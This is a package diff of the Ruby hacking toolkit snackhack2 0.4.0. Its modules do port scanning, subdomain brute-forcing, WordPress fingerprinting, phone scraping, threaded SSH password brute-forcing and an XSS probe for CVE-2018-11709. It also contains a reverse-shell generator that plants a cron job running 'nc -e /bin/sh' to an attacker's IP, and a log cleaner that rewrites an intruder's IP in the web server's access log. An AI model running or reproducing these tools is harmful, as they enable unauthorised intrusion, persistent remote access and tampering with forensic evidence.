snackhack2 0.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,57 @@
1
+ require 'httparty'
2
+ require 'spidr'
3
+ module Snackhack2
4
+ class PhoneNumber
5
+ attr_accessor :save_file
6
+
7
+ def initialize(site, save_file: true)
8
+ @site = site
9
+ @save_file = save_file
10
+ end
11
+
12
+ def save_file
13
+ @save_file
14
+ end
15
+
16
+ def run
17
+ numbers = []
18
+ http = Snackhack2::get(@site)
19
+ if http.code == 200
20
+ regex = http.body
21
+ t = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
22
+ out = t.map { |n| n[0] }.compact
23
+ numbers << out
24
+ else
25
+ puts "[+] Status code: #{http.code}"
26
+ end
27
+ if !numbers.empty?
28
+ if @save_file
29
+ hostname = URI.parse(@site).host
30
+ puts "[+] Saving to #{hostname}_phone_numbers.txt..."
31
+ Snackhack2::file_save(@site, "phone_numbers", numbers.join("\n"))
32
+ end
33
+ end
34
+ end
35
+
36
+ def spider
37
+ phone_numbers = []
38
+ Spidr.start_at(@site, max_depth: 4) do |agent|
39
+ agent.every_page do |page|
40
+ body = page.to_s
41
+ if body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
42
+ pn = body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)[0]
43
+ if !pn.nil?
44
+ pn = pn.compact.select { |i| !i.to_s.nil? }.shift
45
+ if !phone_numbers.include?(pn.to_s)
46
+ phone_numbers << pn
47
+ end
48
+ end
49
+ end
50
+ end
51
+ end
52
+ if !phone_numbers.empty?
53
+ Snackhack2::file_save(@site, "phonenumbers", phone_numbers.join("\n")) if @save_file
54
+ end
55
+ end
56
+ end
57
+ end
@@ -0,0 +1,36 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'packetfu'
4
+ module Snackhack2
5
+ class PortScan
6
+ def initialize(ip)
7
+ @ip = ip
8
+ end
9
+
10
+ def run
11
+ threads = []
12
+ ports = [*1..1000]
13
+ ports.each { |i| threads << Thread.new { tcp(i) } }
14
+ threads.each(&:join)
15
+ end
16
+
17
+ def tcp(i)
18
+ open_ports = []
19
+ begin
20
+ Timeout.timeout(1) do
21
+ s = TCPSocket.new(@ip, i)
22
+ s.close
23
+ open_ports << i
24
+ rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
25
+ return false
26
+ end
27
+ rescue Timeout::Error
28
+ end
29
+ return if open_ports.empty?
30
+
31
+ open_ports.each do |port|
32
+ puts "#{port} is open"
33
+ end
34
+ end
35
+ end
36
+ end
@@ -0,0 +1,16 @@
1
+ require 'base64'
2
+ module Snackhack2
3
+ class ReverseShell
4
+ def initialize(ip, port)
5
+ @ip = ip
6
+ @port = port
7
+ end
8
+
9
+ def run
10
+ c = %Q{#!/bin/bash
11
+ line="* * * * * nc -e /bin/sh #{@ip} #{@port}"
12
+ (crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
13
+ puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
14
+ end
15
+ end
16
+ end
@@ -0,0 +1,80 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Snackhack2
4
+ class Robots
5
+ def initialize(site, save_file: true)
6
+ @site = site
7
+ @http = Snackhack2::get(File.join(@site, "robots.txt"))
8
+ @save_file = save_file
9
+ end
10
+
11
+ attr_reader :save_file
12
+
13
+ def run
14
+ save_txt_file = ''
15
+ allow = allow_robots
16
+ disallow = disallow_robots
17
+ if @save_file
18
+ save_txt_file += "ALLOW:\n\n"
19
+ unless allow.empty?
20
+ allow.each do |list|
21
+ save_txt_file += list
22
+ end
23
+ end
24
+ save_txt_file += "DISALLOW:\n\n"
25
+ unless disallow.empty?
26
+ disallow.each do |list|
27
+ save_txt_file += list
28
+ end
29
+ end
30
+ else
31
+ puts allow
32
+ puts disallow
33
+ end
34
+ Snackhack2::file_save(@site, "robots", save_txt_file) if @save_file
35
+ end
36
+
37
+ def allow_robots
38
+ allow_dir = []
39
+ if @http.code == 200
40
+ body = @http.body.lines
41
+ body.each do |l|
42
+ allow_dir << l.split('Allow: ')[1] if l.match(/Allow:/)
43
+ end
44
+ else
45
+ puts "[+] Not giving code 200.\n"
46
+ end
47
+ open_links = []
48
+ allow_dir.each do |path|
49
+ link = Snackhack2::get(File.join(@site, path.strip))
50
+ if link.code == 200
51
+ valid_links = "#{@site}#{path}"
52
+ open_links << valid_links
53
+ end
54
+ end
55
+ open_links
56
+ end
57
+
58
+ def disallow_robots
59
+ disallow_dir = []
60
+ if @http.code == 200
61
+ body = @http.body.lines
62
+ body.each do |l|
63
+ disallow_dir << l.split('Disallow: ')[1] if l.match(/Disallow:/)
64
+ end
65
+ else
66
+ puts "[+] Not giving code 200.\n"
67
+ end
68
+ open_links = []
69
+ disallow_dir.each do |path|
70
+ link = Snackhack2::get(File.join(@site, path.strip))
71
+ if link.code == 200
72
+ valid_links = "#{@site}#{path}"
73
+ open_links << valid_links
74
+ end
75
+ rescue StandardError
76
+ end
77
+ open_links
78
+ end
79
+ end
80
+ end
@@ -0,0 +1,22 @@
1
+ require 'httparty'
2
+ require 'nokogiri'
3
+ module Snackhack2
4
+ class SiteMap
5
+ def initialize(site)
6
+ @site = site
7
+ end
8
+
9
+ def run
10
+ sm = Snackhack2::get(File.join(@site, "sitemap.xml"))
11
+ if sm.code == 200
12
+ if !sm.body.include?("Not Found")
13
+ Snackhack2::file_save(@site, "site.xml", sm.body)
14
+ else
15
+ puts "[+] Eh. I don't think the site has a sitemap. Manually check just in case... :(\n\n"
16
+ end
17
+ else
18
+ puts "[+] Status Code: #{sm.code}"
19
+ end
20
+ end
21
+ end
22
+ end
@@ -0,0 +1,32 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'net/ssh'
4
+ module Snackhack2
5
+ class SSHBute
6
+ def initialize(ip, list: nil)
7
+ @ip = ip
8
+ @list = list
9
+ @success_list = []
10
+ end
11
+
12
+ def list
13
+ File.join(__dir__, 'lists', 'sshbrute.txt')
14
+ end
15
+
16
+ def run
17
+ threads = []
18
+ File.readlines(list).each { |usr, pass| threads << Thread.new { brute(usr, pass) } }
19
+ threads.each(&:join)
20
+
21
+ p @success_list
22
+ end
23
+
24
+ def brute(username, pass)
25
+ Net::SSH.start(@ip, username, password: pass, timeout: 1) do |ssh|
26
+ @success_list << [username, pass]
27
+ ssh.exec!('hostname')
28
+ end
29
+ rescue Net::SSH::AuthenticationFailed
30
+ end
31
+ end
32
+ end
@@ -0,0 +1,68 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'uri'
4
+ require 'resolv'
5
+ require 'async/http/internet'
6
+ module Snackhack2
7
+ class Subdomains
8
+ def initialize(site, wordlist: nil)
9
+ @site = site
10
+ @wordlist = wordlist
11
+ end
12
+
13
+ def site
14
+ @site.gsub("https://", "")
15
+ end
16
+
17
+ def wordlist
18
+ File.join(__dir__, 'lists', 'subdomains.txt')
19
+ end
20
+
21
+ def run
22
+ File.readlines(wordlist).each do |sd|
23
+ resolv(sd)
24
+ end
25
+ end
26
+
27
+ def brute
28
+ found = ""
29
+ File.readlines(wordlist).each do |l|
30
+ s = "#{l.strip}.#{site}"
31
+ begin
32
+ puts File.join("https://", s)
33
+ g = Snackhack2::get(File.join("https://", s))
34
+ if g.code == 200
35
+ found += s + "\n"
36
+ elsif g.code == 300
37
+ found += s + "\n"
38
+ else
39
+ puts "HTTP Code: #{g.code}"
40
+ end
41
+ rescue => e
42
+ puts e
43
+ end
44
+ end
45
+ Snackhack2::file_save(@site, "subdomain_brute", found)
46
+ end
47
+
48
+ def resolv(sd)
49
+ # NOTE: this is really slow & multi thread does not work
50
+ # due to resolv
51
+ active = []
52
+ subdomains = []
53
+ Resolv::DNS.open do |dns|
54
+ ress = dns.getresources "#{sd}.#{@site}", Resolv::DNS::Resource::IN::A
55
+ unless ress.map(&:address).empty?
56
+ address = ress.map(&:address)
57
+ unless active.include?(address)
58
+ active << address
59
+ subdomains << "#{sd}.#{@site}" unless subdomains.include?(sd)
60
+ end
61
+ end
62
+ end
63
+ host = URI.parse(@site).host
64
+ File.open("#{host}_subdomains.txt", 'w+') { |file| file.write(subdomains.join("\n")) }
65
+ File.open("#{host}_ips.txt", 'w+') { |file| file.write(active.join("\n")) }
66
+ end
67
+ end
68
+ end
@@ -0,0 +1,43 @@
1
+ require 'async/http/internet'
2
+ module Snackhack2
3
+ class Subdomains2
4
+ def initialize(site)
5
+ @site = site
6
+ @urls = []
7
+ end
8
+
9
+ def wordlist
10
+ File.join(__dir__, 'lists', 'subdomains.txt')
11
+ end
12
+
13
+ def save
14
+ Snackhack2::file_save(@site, "subdomain_brute2", @urls.join("\n"))
15
+ end
16
+
17
+ def run
18
+ File.readlines(wordlist).each do |a|
19
+ url = "https://" + a.strip + "." + @site.gsub("https://", "")
20
+ fetch(url)
21
+ puts url
22
+ end
23
+ save
24
+ end
25
+
26
+ def fetch(url)
27
+ begin
28
+ Sync do |task|
29
+ task.with_timeout(2) do
30
+ internet = Async::HTTP::Internet.new
31
+ m = internet.get(url, { "user-agent" => Snackhack2::UA })
32
+ if m.status == 200 or m.status == 301
33
+ @urls << url
34
+ end
35
+ m.read
36
+ end
37
+ end
38
+ rescue => e
39
+ puts e
40
+ end
41
+ end
42
+ end
43
+ end
@@ -0,0 +1,21 @@
1
+ require 'nokogiri'
2
+ module Snackhack2
3
+ class TomCat
4
+ def initialize(site)
5
+ @site = site
6
+ end
7
+
8
+ def run
9
+ tc = Snackhack2::get(File.join(@site, "/docs/"))
10
+ if tc.code == 404
11
+ if tc.body.include?("Tomcat")
12
+ doc = Nokogiri::HTML(tc.body)
13
+ version = doc.at('h3').text
14
+ puts "[+] Looks like the site is Tomcat, running #{version}."
15
+ end
16
+ else
17
+ puts "[+] Status code: #{tc.code}"
18
+ end
19
+ end
20
+ end
21
+ end
@@ -0,0 +1,5 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Snackhack2
4
+ VERSION = '0.4.0'
5
+ end
@@ -0,0 +1,26 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Snackhack2
4
+ class WebServerCleaner
5
+ def initialize(ip, path: File.join('/var/log', 'access.log'))
6
+ @ip = ip
7
+ @path = path
8
+ end
9
+
10
+ def run
11
+ out = ''
12
+ # generate random IP
13
+ new_ip = Array.new(4) { rand(256) }.join('.')
14
+ File.readlines(@path).each do |line|
15
+ old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
16
+ out += if old_ip.to_s == @ip
17
+ line.gsub(old_ip.to_s, new_ip)
18
+ else
19
+ line
20
+ end
21
+ end
22
+ File.delete(@path)
23
+ File.open(@path, 'w+') { |file| file.write(out) }
24
+ end
25
+ end
26
+ end
@@ -0,0 +1,28 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteLinks
7
+ attr_accessor :save_file
8
+
9
+ def initialize(site, save_file: true)
10
+ @site = site
11
+ @save_file = save_file
12
+ end
13
+
14
+ def run
15
+ doc = Nokogiri::HTML(URI.open(@site))
16
+ links = doc.xpath('//a')
17
+ all_links = links.map { |e| e['href'] }.compact
18
+ content = all_links.uniq.join("\n")
19
+ if @save_file
20
+ Snackhack2::file_save(@site, "links", content)
21
+ else
22
+ all_links.each do |links|
23
+ puts links
24
+ end
25
+ end
26
+ end
27
+ end
28
+ end
@@ -0,0 +1,19 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteMeta
7
+ def initialize(site)
8
+ @site = site
9
+ end
10
+
11
+ def run
12
+ doc = Nokogiri::HTML(URI.open(@site))
13
+ posts = doc.xpath('//meta')
14
+ posts.each do |link|
15
+ puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
16
+ end
17
+ end
18
+ end
19
+ end
@@ -0,0 +1,123 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'json'
4
+ module Snackhack2
5
+ class WordPress
6
+ attr_accessor :save_file, :site
7
+
8
+ def initialize(site, save_file: true)
9
+ @site = site
10
+ @save_file = save_file
11
+ end
12
+
13
+ def run
14
+ wp_login
15
+ yoast_seo
16
+ users
17
+ wp_content_uploads
18
+ all_in_one_seo
19
+ wp_log
20
+ end
21
+
22
+ def file_site
23
+ @site = @site.gsub('https://', '')
24
+ end
25
+
26
+ def users
27
+ found_users = ''
28
+ begin
29
+ users = Snackhack2::get(File.join(@site, "wp-login", "wp", "users")).body
30
+ json = JSON.parse(users)
31
+ json.each do |k|
32
+ found_users += "#{k['name']}\n"
33
+ end
34
+ rescue StandardError => e
35
+ puts "[+] users not found\n\n\n"
36
+ end
37
+
38
+ if !found_users.empty?
39
+ if @save_file
40
+ Snackhack2::file_save(@site, "users", found_users)
41
+ else
42
+ puts found_users
43
+ end
44
+ end
45
+ end
46
+
47
+ def wp_content_uploads
48
+ s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
49
+ if s.code == 200
50
+ if s.body.include?('Index of')
51
+ puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid..."
52
+ end
53
+ end
54
+ end
55
+
56
+ def wp_login
57
+ percent = 0
58
+ ## todo: maybe add Bayes Theorem to detect wp
59
+ wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
60
+ 'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
61
+ login = Snackhack2::get(File.join(@site, "wp-login.php"))
62
+ if login.code == 200
63
+ wp.each do |path|
64
+ percent += 10 if login.body.include?(path)
65
+ end
66
+ end
67
+ login2 = Snackhack2::get(@site.to_s)
68
+ wp.each do |path|
69
+ percent += 10 if login2.body.include?(path)
70
+ end
71
+ puts "Wordpress Points: #{percent}"
72
+ end
73
+
74
+ def yoast_seo
75
+ ys = Snackhack2::get(@site)
76
+ if ys.code == 200
77
+ if ys.body.match(/ This site is optimized with the Yoast SEO plugin\s.\d\d.\d/)
78
+ puts "#{ys.body.match(/ This site is optimized with the Yoast SEO plugin\s.\d\d.\d/)}"
79
+ end
80
+ end
81
+ end
82
+
83
+ def all_in_one_seo
84
+ alios = Snackhack2::get(@site)
85
+ if alios.code == 200
86
+ if alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
87
+ puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
88
+ end
89
+ end
90
+ end
91
+
92
+ def wp_log
93
+ wplog_score = 0
94
+ wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
95
+ log = Snackhack2::get(File.join(@site, "/wp-content/debug.log"))
96
+ if log.code == 200
97
+ puts "[+] #{File.join(@site, "/wp-content/debug.log")} is giving status 200. Now double checking...\n\n\n"
98
+ wp.each do |e|
99
+ if log.body.include?(e)
100
+ wplog_score += 10
101
+ end
102
+ end
103
+ end
104
+ puts "WordPress Log score: #{wplog_score}...\n\n\n"
105
+ end
106
+
107
+ def wp_plugin
108
+ wp_plugin_score = 0
109
+ wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
110
+ plug = Snackhack2::get(File.join(@site, '/wp-content/plugins/'))
111
+ if plug.code == 200
112
+ puts "[+] Looks like #{File.join(@site,
113
+ '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
114
+ wp.each do |e|
115
+ if plug.body.include?(e)
116
+ wp_plugin_score += 10
117
+ end
118
+ end
119
+ end
120
+ puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
121
+ end
122
+ end
123
+ end
@@ -0,0 +1,21 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'httparty'
4
+ module Snackhack2
5
+ class WPForoForum
6
+ def initialize(site)
7
+ @site = site
8
+ end
9
+
10
+ # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
11
+ # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
12
+ def run
13
+ wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
14
+ if wp.code == 200
15
+ puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
16
+ else
17
+ puts "[+] HTTP code #{wp.code}"
18
+ end
19
+ end
20
+ end
21
+ end
data/lib/snackhack2.rb ADDED
@@ -0,0 +1,59 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'uri'
4
+ require 'httparty'
5
+ require_relative 'snackhack2/version'
6
+ require_relative 'snackhack2/bannergrabber'
7
+ require_relative 'snackhack2/wordpress'
8
+ require_relative 'snackhack2/portscan'
9
+ require_relative 'snackhack2/iplookup'
10
+ require_relative 'snackhack2/robots'
11
+ require_relative 'snackhack2/subdomains'
12
+ require_relative 'snackhack2/sshbrute'
13
+ require_relative 'snackhack2/website_meta'
14
+ require_relative 'snackhack2/google_analytics'
15
+ require_relative 'snackhack2/cryptoextractor'
16
+ require_relative 'snackhack2/website_links'
17
+ require_relative 'snackhack2/webserver_log_cleaner'
18
+ require_relative 'snackhack2/wpForo_Forum'
19
+ require_relative 'snackhack2/WP_Symposium'
20
+ require_relative 'snackhack2/phone_number'
21
+ require_relative 'snackhack2/emails'
22
+ require_relative 'snackhack2/drupal'
23
+ require_relative 'snackhack2/Honeywell_PM43'
24
+ require_relative 'snackhack2/sitemap'
25
+ require_relative 'snackhack2/tomcat'
26
+ require_relative 'snackhack2/subdomains2'
27
+ require_relative 'snackhack2/reverse_shell'
28
+
29
+ module Snackhack2
30
+ UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
31
+ def self.read_serverversion
32
+ files = Dir['*.txt']
33
+ files.each do |f|
34
+ read = File.read(f)
35
+ puts "#{f.split('_')[0]}: #{read}"
36
+ end
37
+ end
38
+
39
+ def self.clean_serverversion
40
+ # this wil remove all files that have '_serverversion'
41
+ # in the file name
42
+ Dir['*.txt'].each do |file|
43
+ if file.include?('_serverversion')
44
+ puts "[+] deleting #{file}..."
45
+ File.delete(file)
46
+ end
47
+ end
48
+ end
49
+
50
+ def self.file_save(site, type, content)
51
+ hostname = URI.parse(site).host
52
+ File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
53
+ puts "[+] Saving file to #{hostname}_#{type}.txt..."
54
+ end
55
+
56
+ def self.get(site)
57
+ HTTParty.get(site, { headers: { "User-Agent" => UA } })
58
+ end
59
+ end